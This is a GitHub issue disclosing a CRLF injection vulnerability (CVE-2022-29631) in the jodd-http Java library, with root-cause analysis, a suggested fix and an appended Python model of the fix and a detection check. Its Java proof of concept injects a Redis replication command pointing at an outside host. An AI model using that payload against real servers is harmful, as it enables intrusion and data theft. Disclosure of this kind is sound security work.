
CRLF injection vulnerability in jodd-http #9

Closed
@1nhann

Description

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29631

CRLF injection vulnerability in jodd-http

CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http versions 5.0.x, 5.1.x, 5.2.x, 6.0.x, 6.1.x, 6.2.x (all versions so far) allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL.

Proof of concept:

```xml
<dependency>
    <groupId>org.jodd</groupId>
    <artifactId>jodd-http</artifactId>
    <version>6.2.0</version>
</dependency>
```

```java
package top.inhann;

import jodd.http.HttpRequest;
import jodd.http.HttpResponse;

public class Test {
    public static void main(String[] args) {
        // The path part of the URL carries CRLF sequences followed by further lines;
        // HttpRequest appends the path verbatim when building the request payload.
        String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
        HttpRequest req = HttpRequest.get(url);
        HttpResponse res = req.send();
    }
}
```

Run the PoC while listening on 127.0.0.1:6379:

[screenshot of the listener output omitted]

Details:

In jodd.http.HttpRequest#set(), when processing the path, this.path(destination); is called, and it allows \r\n to be injected into the query string, path and fragment.

In jodd.http.HttpRequest#sendTo(), this.buffer(true); is called to build the HTTP request payload. However, the path, query string, fragment and other components are simply appended without sanitization, which leads to the CRLF injection.

Suggestion:

It is recommended to URL-encode the invalid characters when constructing the HTTP request payload.
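As an added illustration (not code from this report or from jodd-http), the following Python models the two ways of building the request payload that the report contrasts: appending path, query and fragment verbatim, versus percent-encoding control characters first, plus a check that counts request-lines in the resulting buffer. The URL splitter and the injected URL are constructed for this example.

```python
import re

# Minimal URL splitter, constructed for this example (it is not jodd's parser).
_URL = re.compile(
    r"^(?P<scheme>https?)://(?P<host>[^/?#]+)(?P<path>[^?#]*)"
    r"(?:\?(?P<query>[^#]*))?(?:#(?P<fragment>.*))?$", re.S)

# Constructed test input: CRLF inside the path smuggles an extra header and
# a second request-line, the same shape of URL the report describes.
INJECTED_URL = ("http://127.0.0.1:8080/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
                "X-Injected: 1\r\n\r\nGET /second")

def split_url(url):
    m = _URL.match(url)
    if not m or re.search(r"[\x00-\x20\x7f]", m["host"]):
        raise ValueError("unsupported or malformed URL")
    return m["host"], m["path"] or "/", m["query"], m["fragment"]

def percent_encode_unsafe(s):
    """Percent-encode every byte that may not appear raw in a request-target:
    ASCII controls (CR and LF included), space, DEL and non-ASCII bytes.
    An existing '%' is left alone, so already-encoded input is not re-encoded."""
    return "".join(chr(b) if 0x20 < b < 0x7f else "%%%02X" % b
                   for b in s.encode("utf-8"))

def build_request(url, method="GET", encode=True):
    """Build the raw request bytes. encode=False mimics the flawed verbatim
    concatenation the report describes; encode=True applies the suggested fix."""
    host, path, query, fragment = split_url(url)
    target = path
    if query is not None:
        target += "?" + query
    if fragment is not None:          # the report says the fragment is appended too
        target += "#" + fragment
    if encode:
        target = percent_encode_unsafe(target)
    return f"{method} {target} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()

def count_request_lines(payload):
    """Check on an outgoing buffer: exactly one request-line is expected;
    more than one means a CRLF sequence split the request-target."""
    line = re.compile(rb"^[A-Z]+ .* HTTP/1\.[01]$")
    return sum(1 for l in payload.split(b"\r\n") if line.match(l))

if __name__ == "__main__":
    for encode in (False, True):
        payload = build_request(INJECTED_URL, encode=encode)
        print(f"encode={encode}: {count_request_lines(payload)} request-line(s)")
        print(payload.decode(errors="replace"))
```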
